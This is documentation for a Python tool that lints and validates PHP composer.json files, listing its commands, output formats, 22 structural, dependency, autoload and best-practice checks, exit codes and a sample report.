Composer JSON Validator
Validate and lint PHP Composer composer.json files for structure, dependencies, autoload configuration, and best practices.
Commands
lint — Run all lint checks
python3 scripts/composer_json_validator.py lint composer.json
python3 scripts/composer_json_validator.py lint composer.json --strict
python3 scripts/composer_json_validator.py lint composer.json --format json
python3 scripts/composer_json_validator.py lint composer.json --format markdown
dependencies — Inspect require/require-dev
python3 scripts/composer_json_validator.py dependencies composer.json
python3 scripts/composer_json_validator.py dependencies composer.json --format json
scripts — Inspect scripts section
python3 scripts/composer_json_validator.py scripts composer.json
python3 scripts/composer_json_validator.py scripts composer.json --format markdown
validate — Full validation (structure + lint + summary)
python3 scripts/composer_json_validator.py validate composer.json
python3 scripts/composer_json_validator.py validate composer.json --strict --format json
Flags
| Flag | Description |
|---|
--strict | Exit code 1 on warnings (CI-friendly) |
--format text | Human-readable output (default) |
--format json | Machine-readable JSON |
--format markdown | Markdown report |
Lint Rules (22 checks)
Structure (5)
- Valid JSON syntax
- Required fields:
name, description, type
- Valid package name format (
vendor/package)
- Valid
type value (library, project, metapackage, composer-plugin)
license field present and valid SPDX identifier
Dependencies (6)
- No duplicate packages across
require and require-dev
- Version constraints use valid operators (
^, ~, >=, etc.)
- No dev-only packages in
require (phpunit, mockery, etc.)
- No wildcard
* versions
- PHP version constraint present in
require
ext-* dependencies are explicit (not *)
Autoload (4)
- PSR-4 autoload defined
- Namespace ends with
\\ (PSR-4 convention)
- No duplicate namespaces across autoload entries
autoload-dev separate from autoload
Best Practices (7)
scripts section present- No
post-install-cmd/post-update-cmd executing arbitrary URLs
config.sort-packages enabledminimum-stability explicit when not stableprefer-stable set when minimum-stability is not stable- No hardcoded absolute paths in autoload
- All repository URLs use HTTPS
Exit Codes
| Code | Meaning |
|---|
| 0 | No errors (warnings allowed unless --strict) |
| 1 | Errors found (or warnings in --strict mode) |
| 2 | Invalid arguments / file not found |
Example Output
composer.json lint results
==========================
[ERROR] name: Package name must match vendor/package format
[WARN] dependencies: phpunit/phpunit found in require (should be in require-dev)
[WARN] autoload: config.sort-packages not enabled
[INFO] scripts: scripts section present
Summary: 1 error(s), 2 warning(s), 1 info
